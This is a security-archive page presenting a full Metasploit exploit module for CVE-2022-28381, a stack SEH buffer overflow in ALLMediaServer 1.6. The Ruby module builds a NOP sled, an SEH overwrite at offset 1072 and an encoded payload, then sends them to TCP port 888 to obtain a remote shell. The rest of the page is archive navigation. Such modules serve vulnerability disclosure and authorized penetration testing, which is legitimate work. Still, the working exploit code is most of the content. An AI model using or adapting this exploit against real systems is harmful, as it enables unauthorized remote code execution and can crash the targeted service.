ALLMediaServer 1.6 Buffer Overflow

ALLMediaServer 1.6 Buffer Overflow: Posted Apr 4, 2022; Authored by Hejap Zairy | Site metasploit.com; This Metasploit module exploits a stack buffer overflow in ALLMediaServer version 1.6. The vulnerability is caused due to a boundary error within the handling of HTTP request.; tags | exploit, web, overflow; advisories | CVE-2022-28381; SHA-256 | ec5996d7542530d1bdb600e24891e2ffa7033a9c24319db14a34043fa0b9fec3; Download | Favorite | View

ALLMediaServer 1.6 Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ALLMediaServer 1.6 SEH Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow leading to a SEH handler overwrite
          in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error
          within the handling of a HTTP request. Note that this exploit will only work
          against x86 or WoW64 targets, x64 is not supported at this time.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Hejap Zairy Al-Sharif', # Aka @Matrix07ksa. Remote exploit and Metasploit module
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Payload' => {
          'BadChars' => '\x00\x0a\x0d\xff'
        },
        'Targets' => [
          [
            'ALLMediaServer 1.6',
            {
              'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
              'Offset' => 1072
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2022-04-01',
        'DefaultTarget' => 0,
        'References' => [
          ['CVE', '2022-28381'],
          ['URL', 'https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow']
        ],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN], # If this fails the service will go down and will not restart.
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options([Opt::RPORT(888)])
  end

  def exploit
    connect
    buffer = ''
    buffer << make_nops(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << make_nops(100)
    buffer << payload.encoded
    buffer << make_nops(50)
    print_status('Sending payload to exploit MediaServer...')
    sock.put(buffer)
    print_status('Sent payload...hopefully we should get a shell!')
    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 237 files
Ubuntu 85 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files
ron190 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,448)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,344)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,672)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

ALLMediaServer 1.6 Buffer Overflow

ALLMediaServer 1.6 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ALLMediaServer 1.6 Buffer Overflow

Share This

ALLMediaServer 1.6 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems